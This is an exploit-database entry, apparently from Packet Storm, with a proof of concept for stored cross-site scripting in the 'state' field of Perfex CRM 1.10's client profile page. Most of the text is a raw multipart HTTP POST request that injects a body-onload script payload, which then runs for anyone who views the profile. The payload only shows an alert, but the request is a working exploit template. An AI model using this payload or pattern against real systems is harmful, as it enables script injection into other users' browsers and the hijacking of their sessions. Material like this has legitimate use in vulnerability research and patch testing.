Exploit for perfexcrm 1.10 Cross Site Scripting

## https://sploitus.com/exploit?id=PACKETSTORM:163396
# Exploit Title: perfexcrm 1.10 - 'State' Stored Cross-site scripting (XSS)  
# Date: 05/07/2021  
# Exploit Author: Alhasan Abbas (exploit.msf)  
# Vendor Homepage: https://www.perfexcrm.com/  
# Version: 1.10  
# Tested on: windows 10  
  
Vunlerable page: /clients/profile  
  
POC:  
----  
POST /clients/profile HTTP/1.1  
  
Host: localhost  
  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0  
  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
  
Accept-Language: en-US,en;q=0.5  
  
Accept-Encoding: gzip, deflate  
  
Content-Type: multipart/form-data; boundary=---------------------------325278703021926100783634528058  
  
Content-Length: 1548  
  
Origin: http://localhost  
  
Connection: close  
  
Referer: http://localhost/clients/profile  
  
Cookie: sp_session=07c611b7b8d391d144a06b39fe55fb91b744a038  
  
Upgrade-Insecure-Requests: 1  
  
  
  
-----------------------------325278703021926100783634528058  
  
Content-Disposition: form-data; name="profile"  
  
  
  
1  
  
-----------------------------325278703021926100783634528058  
  
Content-Disposition: form-data; name="profile_image"; filename=""  
  
Content-Type: application/octet-stream  
  
  
  
  
  
-----------------------------325278703021926100783634528058  
  
Content-Disposition: form-data; name="firstname"  
  
  
  
adfgsg  
  
-----------------------------325278703021926100783634528058  
  
Content-Disposition: form-data; name="lastname"  
  
  
  
fsdgfdg  
  
-----------------------------325278703021926100783634528058  
  
Content-Disposition: form-data; name="company"  
  
  
  
test  
  
-----------------------------325278703021926100783634528058  
  
Content-Disposition: form-data; name="vat"  
  
  
  
1  
  
-----------------------------325278703021926100783634528058  
  
Content-Disposition: form-data; name="phonenumber"  
  
  
  
  
  
-----------------------------325278703021926100783634528058  
  
Content-Disposition: form-data; name="country"  
  
  
  
105  
  
-----------------------------325278703021926100783634528058  
  
Content-Disposition: form-data; name="city"  
  
  
  
asdf  
  
-----------------------------325278703021926100783634528058  
  
Content-Disposition: form-data; name="address"  
  
  
  
asdf  
  
-----------------------------325278703021926100783634528058  
  
Content-Disposition: form-data; name="zip"  
  
  
  
313  
  
-----------------------------325278703021926100783634528058  
  
Content-Disposition: form-data; name="state"  
  
  
  
""><body onload=alert("XSS")>">  
  
-----------------------------325278703021926100783634528058--  
  
then any one open profile page in user the xss its executed